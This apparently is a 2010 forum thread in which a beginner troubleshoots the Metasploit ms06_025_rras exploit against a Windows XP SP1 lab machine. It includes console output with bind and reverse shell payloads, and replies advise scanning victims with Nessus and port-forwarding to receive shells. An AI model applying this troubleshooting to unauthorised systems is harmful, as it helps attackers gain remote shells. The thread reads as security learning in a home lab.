View Full Version : ms06_025_rras Will Not Bind - help

01-04-2010, 12:04 AM
I am taking my first faltering steps with this so please be gentle !!

Can anyone tell me what is happening please ? 2 PCs on same network - target = [XP with SP1 only], Host =, No firewalls or virus software running on either.
Extracts from terminal :

msf exploit(ms06_025_rras) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE SRVSVC yes The pipe name to use (ROUTER, SRVSVC)

Payload options (windows/shell_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST no The target address

Exploit target:
Id Name
-- ----
1 Windows XP SP1

msf exploit(ms06_025_rras) > exploit

* Started bind handler
* Binding to 20610036-fa22-11cf-9823-00a0c911e5df:1.0@ncacn_np:[\SRVSVC] ...
[-] Exploit failed: Could not bind to 20610036-fa22-11cf-9823-00a0c911e5df:1.0@ncacn_np:[\SRVSVC]
* Exploit completed, but no session was created.

msf exploit(ms06_025_rras) >

I get EXACTLY the same result if the target has NO SPs or just SP1. Also same result if I try a reverse shell payload [windows/shell_reverse_tcp]. Have run the same exploits from Linux and Windows and STILL get same result.

Could someone point me in the right direction please ? Thanks.


All sorted.
I wasnt getting a bind because not all Windows SP1 boxes have the Remote Access Connection Manager service up and running.
My target was set to 'Manual'. When the service was started the exploit worked as it was intended.

01-04-2010, 12:44 PM
Try to use other Payloads, or an other Exploit.
Use the Nessus Vulnerability Scanner to find out.
Then load it to Metasploit, it will show you the probably working exploits on your victim machine

01-04-2010, 12:55 PM
As HD already outlined:

This message indicates that the target RPC service was not available; is
RRAS setup on these machines? This is a service you generally have to
configure manually before exploiting it becomes possible.

03-07-2010, 03:07 AM
just as they mentioned . you may want to try another exploit. another reason why you might not be getting any results, may be due to the fact that on the port that youre suppost too be receiving a shell. that specific port may be closed. therefore you may want to look into "port forwarding".